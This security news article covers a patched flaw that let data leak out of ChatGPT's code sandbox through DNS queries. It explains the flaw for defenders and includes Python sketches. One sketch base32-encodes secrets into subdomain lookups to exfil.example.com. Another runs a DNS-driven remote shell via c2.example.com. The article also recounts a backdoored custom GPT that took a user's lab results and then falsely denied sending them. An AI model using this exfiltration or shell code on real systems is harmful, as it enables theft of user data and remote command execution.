Check Point Research published technical analysis on March 30 demonstrating a DNS-based data exfiltration technique in ChatGPT’s code execution sandbox. The vulnerability allowed attackers to encode conversation data, uploaded files, and AI-generated summaries into DNS queries sent from inside an environment designed to prevent outbound communication. OpenAI patched the flaw on February 20, 2026, after responsible disclosure by the researchers. The issue is closed. The pattern is worth understanding for any team deploying code execution in sandboxed environments.
The attack exploited a specific architectural asymmetry: the sandbox blocked HTTP requests and prevented custom network actions, but left DNS resolution unrestricted. Because DNS queries are typically regarded as infrastructure operations rather than data transmission channels, the AI model itself treated them as harmless. Attackers could craft prompts that triggered Python code execution, encoding sensitive content into DNS subdomain queries sent to attacker-controlled domains. No user warnings appeared. No approval dialogs fired. By the time the user saw a response, the exfiltration was already complete.
How the Attack Worked
ChatGPT’s code execution and data analysis feature runs inside a sandboxed Linux container. OpenAI states that this environment “is unable to generate outbound network requests directly.” Direct HTTP calls are blocked. Legitimate outbound data sharing through custom GPT Actions requires explicit user approval with a dialog showing the destination and data being sent.
The Check Point researchers found a gap: DNS resolution remained unrestricted inside the container. DNS queries, typically treated as harmless infrastructure for resolving domain names, can encode arbitrary data in the subdomain portion of a request. By crafting a prompt that triggered Python code execution inside the sandbox, an attacker could encode sensitive conversation content into DNS queries sent to an attacker-controlled domain, according to The Register.
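Check Point has not published its exact payload, but the mechanism is simple enough to sketch. The snippet below is a hypothetical illustration rather than the researchers' code: it base32-encodes a string, splits it into DNS-label-sized chunks, and resolves each chunk as a subdomain of a stand-in attacker-controlled domain. The standard library resolver is all it needs, because the query itself is the channel.

```python
import base64
import socket

ATTACKER_DOMAIN = "exfil.example.com"  # placeholder for an attacker-controlled zone

def exfiltrate_via_dns(secret: str) -> None:
    """Leak `secret` through DNS lookups of subdomains under ATTACKER_DOMAIN.

    The attacker's authoritative nameserver logs every query it receives, so
    the data arrives even though each lookup "fails" inside the sandbox.
    """
    # Base32 keeps the payload within the letters-and-digits DNS label alphabet.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()

    # DNS labels max out at 63 characters, so split the payload into chunks.
    chunks = [encoded[i:i + 60] for i in range(0, len(encoded), 60)]

    for seq, chunk in enumerate(chunks):
        fqdn = f"{seq}.{chunk}.{ATTACKER_DOMAIN}"
        try:
            # The answer is irrelevant; the question itself carries the data.
            socket.getaddrinfo(fqdn, None)
        except socket.gaierror:
            pass  # NXDOMAIN is expected and costs the attacker nothing

exfiltrate_via_dns("contents of the uploaded file or conversation summary")
```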
Because the AI model itself assumed the code execution environment was fully isolated, it did not flag the DNS activity as an external data transfer. No approval dialogs appeared. No warnings fired. The user saw a normal ChatGPT response while their data left the system through the DNS channel, per Check Point’s technical writeup.
Three Proof-of-Concept Attacks
Check Point demonstrated three exploitation scenarios. In one, a backdoored custom GPT posing as a health analyst ingested a user’s uploaded PDF containing lab results and personal information. When asked whether it had transmitted the data externally, ChatGPT “answered confidently that it had not, explaining that the file was only stored in a secure internal location,” The Register reported. The data had already been exfiltrated.
The researchers also showed the same hidden communication path could establish remote shell access inside the Linux runtime, enabling direct command execution, per the Check Point research paper.
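Check Point has not released that proof of concept either, but the shape of such a channel follows from the same primitive: commands come in over DNS lookups and output goes back out the same way. The sketch below is hypothetical; it assumes a DNS client library such as dnspython is importable in the runtime, and the c2.example.com zone and TXT-record command layout are invented for illustration.

```python
import base64
import socket
import subprocess

import dns.resolver  # assumes the dnspython package is importable in the runtime

C2_DOMAIN = "c2.example.com"  # placeholder for an attacker-controlled zone

def poll_for_command():
    """Fetch the next command from a TXT record on the attacker's zone."""
    try:
        answer = dns.resolver.resolve(f"cmd.{C2_DOMAIN}", "TXT")
        txt = b"".join(answer[0].strings).decode()
        return base64.b64decode(txt).decode() or None
    except Exception:
        return None

def send_output(output: str) -> None:
    """Return command output via subdomain lookups, as in the exfiltration sketch."""
    encoded = base64.b32encode(output.encode()).decode().rstrip("=").lower()
    for i in range(0, len(encoded), 60):
        try:
            socket.getaddrinfo(f"{i}.{encoded[i:i + 60]}.out.{C2_DOMAIN}", None)
        except socket.gaierror:
            pass

command = poll_for_command()
if command:
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    send_output(result.stdout + result.stderr)
```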
The Pattern for Agent Builders
This is the second distinct OpenAI security disclosure in the past 48 hours. The Codex token exposure targeted developer tooling. Now the ChatGPT DNS exfiltration targets the platform’s core code execution infrastructure.
For teams building on top of AI platforms, the lesson from Check Point’s head of research, Eli Smadja, is direct: “Don’t assume AI tools are secure by default,” he wrote in Check Point’s blog summary. “Just as organizations learned not to blindly trust cloud providers, the same logic now applies to AI vendors.”
The DNS vector in particular matters for any AI system that runs code in a sandboxed environment. If the sandbox blocks HTTP but leaves DNS open, it has a data exfiltration channel. That applies to ChatGPT, to Codex, and to any agent framework that executes user-triggered code inside containers with network restrictions.
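A practical audit is a canary lookup fired from inside the sandbox itself: resolve a unique subdomain of a zone whose authoritative query logs you control, then check whether the query arrived. The sketch below illustrates that check, with canary.example.com standing in for a domain you operate.

```python
import socket
import uuid

CANARY_ZONE = "canary.example.com"  # replace with a zone whose query logs you control

def send_dns_canary() -> str:
    """Fire a uniquely labelled DNS lookup from inside the sandbox under test.

    The lookup is expected to fail; the real test is whether the query shows up
    in the canary zone's authoritative query logs. If it does, DNS egress is
    open and the exfiltration channel described above exists.
    """
    label = uuid.uuid4().hex
    try:
        socket.getaddrinfo(f"{label}.{CANARY_ZONE}", None)
    except socket.gaierror:
        pass  # NXDOMAIN and a blocked resolver both land here; the logs decide
    return label

print("search the canary zone's query logs for:", send_dns_canary())
```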
OpenAI fixed this specific flaw. But the underlying architectural assumption — that blocking HTTP constitutes network isolation — is shared across much of the AI agent infrastructure being built right now. Teams deploying agents that handle sensitive data in sandboxed code execution environments should audit their DNS policies.